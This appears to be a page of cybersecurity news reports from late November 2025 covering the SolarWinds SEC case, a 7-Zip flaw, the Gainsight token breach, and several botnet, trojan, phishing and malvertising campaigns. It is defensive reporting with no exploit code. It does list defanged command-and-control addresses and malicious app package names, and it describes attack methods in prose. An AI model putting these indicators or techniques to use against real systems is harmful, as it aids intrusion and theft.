Category: Cybersecurity

Nov 21, 2025Ravie LakshmananCompliance / Cyber Attack

The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, alleging that the company had misled investors about the security practices that led to the 2020 supply chain attack.

In a joint motion filed November 20, 2025, the SEC, along with SolarWinds and its CISO Timothy G. Brown, asked the court to voluntarily dismiss the case.

The SEC said its decision to seek dismissal “does not necessarily reflect the Commission’s position on any other case.”

SolarWinds and Brown were accused by the SEC in October 2023 of “fraud and internal control failures” and that the company defrauded investors by overstating its cybersecurity practices and understating or failing to disclose known risks.

The agency also said both SolarWinds and Brown ignored “repeated red flags” and failed to adequately protect its assets, ultimately leading to the supply chain compromise that came to light in late 2020. The attack was attributed to a Russian state-sponsored threat actor known as APT29.

“Brown was aware of SolarWinds’ cybersecurity risks and vulnerabilities but failed to resolve the issues or, at times, sufficiently raise them further within the company,” the SEC alleged at the time.

However, in July 2024, many of these allegations were thrown out by the U.S. District Court for the Southern District of New York (SDNY), stating “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.”

Subsequently, the SEC also charged Avaya, Check Point, Mimecast, and Unisys for making “materially misleading disclosures” related to the large-scale cyber attack that stemmed from the SolarWinds hack.

In a statement, SolarWinds CEO Sudhakar Ramakrishna said the latest development marks the end of an era that challenged the company, and emphasized “we emerge stronger, more secure, and better prepared than ever for what lies ahead.”

Nov 19, 2025Ravie LakshmananVulnerability / Threat Intelligence

Update: The NHS England Digital, in an updated advisory on November 20, 2025, said it has not observed in-the-wild exploitation of CVE-2025-11001, but noted that it’s “aware of a public proof-of-concept exploit.” It has since removed what it said were “erroneous references” to active exploitation.

The original story follows below –

A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday.

The vulnerability in question is CVE-2025-11001 (CVSS score: 7.0), which allows remote attackers to execute arbitrary code. It has been addressed in 7-Zip version 25.00 released in July 2025.

“The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories,” Trend Micro’s Zero Day Initiative (ZDI) said in an alert released last month. “An attacker can leverage this vulnerability to execute code in the context of a service account.”

Ryota Shiga of GMO Flatt Security Inc., along with the company’s artificial intelligence (AI)-powered AppSec Auditor Takumi, has been credited with discovering and reporting the vulnerability.

It’s worth noting that 7-Zip 25.00 also resolves another flaw, CVE-2025-11002 (CVSS score: 7.0), that allows for remote code execution by taking advantage of improper handling of symbolic links within ZIP archives, resulting in directory traversal. Both shortcomings were introduced in version 21.02.

“Active exploitation of CVE-2025-11001 has been observed in the wild,” NHS England Digital said. However, there are currently no details available on how it’s being weaponized, by whom, and in what context.

Given that there exists proof-of-concept (PoC) exploits, it’s essential that 7-Zip users move quickly to apply the necessary fixes as soon as possible, if not already, for optimal protection.

“This vulnerability can only be exploited from the context of an elevated user / service account or a machine with developer mode enabled,” security researcher Dominik (aka pacbypass), who released the PoC, said in a post detailing the flaw. “This vulnerability can only be exploited on Windows.”

(The story was updated after publication to note that the vulnerability is not under active exploitation as previously mentioned.)

Nov 21, 2025Ravie LakshmananData Breach / SaaS Security

Salesforce has warned of detected “unusual activity” related to Gainsight-published applications connected to the platform.

“Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the company said in an advisory.

The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues.

Salesforce did not disclose how many customers were impacted by the incident, but said it has notified them.

“There is no indication that this issue resulted from any vulnerability in the Salesforce platform,” the company added. “The activity appears to be related to the app’s external connection to Salesforce.”

Out of an abundance of caution, the Gainsight app has been temporarily pulled from the HubSpot Marketplace. “This may also impact Oauth access for customer connections while the review is taking place,” Gainsight said. “No suspicious activity related to Hubspot has been observed at this point.”

In a post shared on LinkedIn, Austin Larsen, principal threat analyst at Google Threat Intelligence Group (GTIG), described it as an “emerging campaign” targeting Gainsight-published applications connected to Salesforce.

The activity is assessed to be tied to threat actors associated with the ShinyHunters (aka UNC6240) group, mirroring a similar set of attacks targeting Salesloft Drift instances earlier this August.

According to DataBreaches.Net, ShinyHunters has confirmed the campaign is their doing and stated that the Salesloft and Gainsight attack waves allowed them to steal data from nearly 1000 organizations.

Interestingly, Gainsight previously said it was also one of the Salesloft Drift customers impacted in the previous attack. But it’s not clear at this stage if the earlier breach played a role in the current incident.

In that hack, the attackers accessed business contact details for Salesforce-related content, including names, business email addresses, phone numbers, regional/location details, product licensing information, and support case contents (without attachments).

“Adversaries are increasingly targeting the OAuth tokens of trusted third-party SaaS integrations,” Larsen pointed out.

In light of the malicious activity, organizations are advised to review all third-party applications connected to Salesforce, revoke tokens for unused or suspicious applications, and rotate credentials if anomalies are flagged from an integration.

Nov 20, 2025Ravie LakshmananBotnet / Malware

Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users.

Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today.

There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site.

The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using lures for games. It’s possible that users searching for pirated versions of these games are the target.

Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command.

“The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained. “Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.”

Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies.

While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself.

The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract. The contract was created on September 23, 2024, and has had 26 transactions to date.

Once the C2 address is retrieved, it checks to ensure it is a valid WebSocket URL, and then proceeds to establish a WebSocket connection with the specific address and receive JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period.

“The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said.

The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.

Exactly who is behind Tsundere is not known, but the presence of the Russian language in the source code for logging purposes alludes to a threat actor who is Russian-speaking. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024.

What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team.

Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time.

“Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said.

Nov 20, 2025Ravie LakshmananVulnerability / Cloud Computing

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet.

The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.

The vulnerability has remained unpatched due to a “long-standing design decision” that’s consistent with Ray’s development best practices, which requires it to be run in an isolated network and act upon trusted code.

The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another.

The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible. However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations.

The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts.

The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said.

The campaign has likely made use of large language models (LLMs) to create the GitLab payloads. This assessment is based on the malware’s “structure, comments, and error handling patterns.”

The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host.

Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.

While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors and identifying which Ray dashboard IP addresses are exploitable using the open-source vulnerability detection tool interact.sh. More than 230,500 Ray servers are publicly accessible.

Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).

“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said.

“This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition. The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”

Nov 20, 2025Ravie LakshmananCybersecurity / Hacking News

This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs. Even simple things like browser add-ons and smart home gadgets are being used to attack people.

Every day, there’s a new story that shows how quickly things are changing in the fight over the internet.

Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security. Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections.

All these stories remind us: the same tech that makes life better can very easily be turned into a weapon.

Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.

Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet. The same apps and tools that make life quicker and easier can also let bad guys in.

It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention.

Governments try to catch hackers, and experts find secret weak spots. But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks.

I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online.

Nov 20, 2025Ravie LakshmananMalware / Mobile Security

Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud.

“A key differentiator is its ability to bypass encrypted messaging,” ThreatFabric said in a report shared with The Hacker News. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.”

Another notable feature is its ability to stage overlay attacks by serving fake login screens atop banking apps to capture victims’ credentials. According to the Dutch mobile security company, Sturnus is privately operated and is currently assessed to be in the evaluation stage. Artifacts distributing the banking malware are listed below –

• Google Chrome (“com.klivkfbky.izaybebnx”)
• Preemix Box (“com.uvxuthoq.noscjahae”)

The malware has been designed to specifically single out financial institutions across Southern and Central Europe with region-specific overlays.

The name Sturnus is a nod to its use of a mixed communication pattern blending plaintext, AES, and RSA, with ThreatFabric likening it to the European starling (binomial name: Sturnus vulgaris), which incorporates a variety of whistles and is known to be a vocal mimic.

The trojan, once launched, contacts a remote server over WebSocket and HTTP channels to register the device and receive encrypted payloads in return. It also establishes a WebSocket channel to allow the threat actors to interact with the compromised Android device during Virtual Network Computing (VNC) sessions.

Besides serving fake overlays for banking apps, Sturnus is also capable of abusing Android’s accessibility services to capture keystrokes and record user interface (UI) interactions. As soon as an overlay for a bank is served to the victim and the credentials are harvested, the overlay for that specific target is disabled so as not to arouse the user’s suspicion.

Furthermore, it can display a full-screen overlay that blocks all visual feedback and mimics the Android operating system update screen to give the impression to the user that software updates are in progress, when, in reality, it allows malicious actions to be carried out in the background.

Some of the malware’s other features include support for monitoring device activity, as well as leveraging accessibility services to gather chat contents from Signal, Telegram, and WhatsApp, as well as send details about every visible interface element on the screen.

This allows the attackers to reconstruct the layout at their end and remotely issue actions related to clicks, text input, scrolling, app launches, permission confirmations, and even enable a black screen overlay. An alternate remote control mechanism packed into Sturnus uses the system’s display-capture framework to mirror the device screen in real-time.

“Whenever the user navigates to settings screens that could disable its administrator status, the malware detects the attempt through accessibility monitoring, identifies relevant controls, and automatically navigates away from the page to interrupt the user,” ThreatFabric said.

“Until its administrator rights are manually revoked, both ordinary uninstallation and removal through tools like ADB are blocked, giving the malware strong protection against cleanup attempts.”

The extensive environment monitoring capabilities make it possible to collect sensor information, network conditions, hardware data, and an inventory of installed apps. This device profile serves as a continuous feedback loop, helping attackers adapt their tactics to sidestep detection.

“Although the spread remains limited at this stage, the combination of targeted geography and high-value application focus implies that the attackers are refining their tooling ahead of broader or more coordinated operations,” ThreatFabric said.

Nov 20, 2025The Hacker NewsOnline Fraud / Web Security

CTM360 has identified a rapidly expanding WhatsApp account-hacking campaign targeting users worldwide via a network of deceptive authentication portals and impersonation pages. The campaign, internally dubbed HackOnChat, abuses WhatsApp’s familiar web interface, using social engineering tactics to trick users into compromising their accounts.

Investigators identified thousands of malicious URLs being hosted on inexpensive top-level domains and rapidly generated through modern website-building platforms, allowing attackers to deploy new pages at scale. The campaign’s activity logs show hundreds of incidents in recent weeks, with a noticeable surge across the Middle East and Asia.

Read the full report here: https://www.ctm360.com/reports/hackonchat-unmasking-the-whatsapp-hacking-scam

The hacking operations and the exploitation techniques

Two techniques dominate these hacking operations. The Session Hijacking, where threat actors misuse the linked-device functionality to hijack active WhatsApp Web sessions, and Account Takeover, which involves deceiving victims into surrendering authentication keys, granting attackers full control of their accounts. Attackers push these links using templates of fake security alerts, WhatsApp Web lookalike portals, and spoofed group-invite messages. These sites are further optimized for global reach, featuring multilingual support and a country-code selector that adapts the interface for users across multiple regions.

Once scammers gain control of a WhatsApp account, they exploit it to target the victim’s contacts, often requesting money or sensitive information under the guise of a trusted source. They may also sift through messages, media, and documents to steal personal, financial, or private data, which can be used for fraud, impersonation, or extortion. Frequently, these attacks extend further as the compromised account is used to send phishing messages to the victim’s contacts, creating a chain of attacks that spreads the scam.

HackOnChat demonstrates that social engineering remains one of the most scalable attack vectors today, especially when attackers exploit trusted and familiar interfaces and the human trust built around them.

Read the full report here and explore all of CTM360’s latest insights and threat intelligence.

Learn more at www.ctm360.com

Nov 20, 2025Ravie LakshmananCyber Warfare / Threat Intelligence

Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic targeting.

The development is a sign that the lines between state-sponsored cyber attacks and kinetic warfare are increasingly blurring, necessitating the need for a new category of warfare, the tech giant’s threat intelligence team said in a report shared with The Hacker News.

While traditional cybersecurity frameworks have treated digital and physical threats as separate domains, CJ Moses, CISO of Amazon Integrated Security, said these delineations are artificial and that nation-state threat actors are engaging in cyber reconnaissance activity to enable kinetic targeting.

“These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives,” Moses added.

As an example, Amazon said it observed Imperial Kitten (aka Tortoiseshell), a hacking group assessed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), conducting digital reconnaissance between December 2021 and January 2024, targeting a ship’s Automatic Identification System (AIS) platform with the goal of gaining access to critical shipping infrastructure.

Subsequently, the threat actor was identified as attacking additional maritime vessel platforms, in one case even gaining access to CCTV cameras fitted on a maritime vessel that provided real-time visual intelligence.

The attack progressed to a targeted intelligence gathering phase on January 27, 2024, when Imperial Kitten carried out targeted searches for AIS location data for a specific shipping vessel. Merely days later, that same vessel was targeted by an unsuccessful missile strike carried out by Iranian-backed Houthi militants.

The Houthi forces have been attributed to a string of missile attacks targeting commercial shipping in the Red Sea in support of the Palestinian militant group Hamas in its war with Israel. On February 1, 2024, the Houthi movement in Yemen claimed it had struck a U.S. merchant ship named KOI with “several appropriate naval missiles.”

“This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure – a critical component of global commerce and military logistics,” Moses said.

Another case study concerns MuddyWater, a threat actor linked to Iran’s Ministry of Intelligence and Security (MOIS), that established infrastructure for a cyber network operation in May 2025, and later used that server a month later to access another compromised server containing live CCTV streams from Jerusalem to gather real-time visual intelligence of potential targets.

On June 23, 2025, around the time Iran launched widespread missile attacks against the city, the Israel National Cyber Directorate disclosed that “Iranians have been trying to connect to cameras to understand what happened and where their missiles hit to improve their precision.”

To pull off these multi-layered attacks, the threat actors are said to have routed their traffic through anonymizing VPN services to obscure their true origins and complicate attribution efforts. The findings serve to highlight that espionage-focused attacks can ultimately be a launchpad for kinetic targeting.

“Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks,” Amazon said. “This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.”

Nov 20, 2025Ravie LakshmananMalvertising / Artificial Intelligence

Threat actors are leveraging bogus installers masquerading as popular software to trick users into installing malware as part of a global malvertising campaign dubbed TamperedChef.

The end goal of the attacks is to establish persistence and deliver JavaScript malware that facilitates remote access and control, per a new report from Acronis Threat Research Unit (TRU). The campaign, per the Singapore-headquartered company, is still ongoing, with new artifacts being detected and associated infrastructure remaining active.

“The operator(s) rely on social engineering by using everyday application names, malvertising, Search Engine Optimization (SEO), and abused digital certificates that aim to increase user trust and evade security detection,” researchers Darrel Virtusio and Jozsef Gegeny said.

TamperedChef is the name assigned to a long-running campaign that has leveraged seemingly legitimate installers for various utilities to distribute an information stealer malware of the same name. It’s assessed to be part of a broader set of attacks codenamed EvilAI that uses lures related to artificial intelligence (AI) tools and software for malware propagation.

To lend these counterfeit apps a veneer of legitimacy, the attackers use code-signing certificates issued for shell companies registered in the U.S., Panama, and Malaysia to sign them, and acquire new ones under a different company name as older certificates are revoked.

Acronis described the infrastructure as “industrialized and business-like,” effectively allowing the operators to steadily churn out new certificates and exploit the inherent trust associated with signed applications to disguise the malicious software as legitimate.

It’s worth noting at this stage that the malware tracked as TamperedChef by Truesec and G DATA is also referred to as BaoLoader by Expel, and is different from the original TamperedChef malware that was embedded within a malicious recipe application distributed as part of the EvilAI campaign.

Acronis told The Hacker News that it’s using TamperedChef to refer to the malware family, since it has already been widely adopted by the cybersecurity community. “This helps avoid confusion and stay consistent with existing publications and detection names used by other vendors, which also refer to the malware family as TamperedChef,” it said.

A typical attack plays out as follows: Users who search for PDF editors or product manuals on search engines like Bing are served malicious ads or poisoned URLs, when clicked, take users to booby-trapped domains registered on NameCheap that deceive them into downloading the installers.

Once executing the installer, users are prompted to agree to the program’s licensing terms. It then launches a new browser tab to display a thank you message as soon as the installation is complete in order to keep up the ruse. However, in the background, an XML file is dropped to create a scheduled task that’s designed to launch an obfuscated JavaScript backdoor.

The backdoor, in turn, connects to an external server and sends basic information, such as session ID, machine ID, and other metadata in the form of a JSON string that’s encrypted and Base64-encoded over HTTPS.

That being said, the end goals of the campaign remain nebulous. Some iterations have been found to facilitate advertising fraud, indicating their financial motives. It’s also possible that the threat actors are looking to monetize their access to other cybercriminals, or harvest sensitive data and sell it in underground forums to enable fraud.

Telemetry data shows that a significant concentration of infections has been identified in the U.S., and to a lesser extent in Israel, Spain, Germany, India, and Ireland. Healthcare, construction, and manufacturing are the most affected sectors.

“These industries appear especially vulnerable to this type of campaign, likely due to their reliance on highly specialized and technical equipment, which often prompts users to search online for product manuals – one of the behaviors exploited by the TamperedChef campaign,” the researchers noted.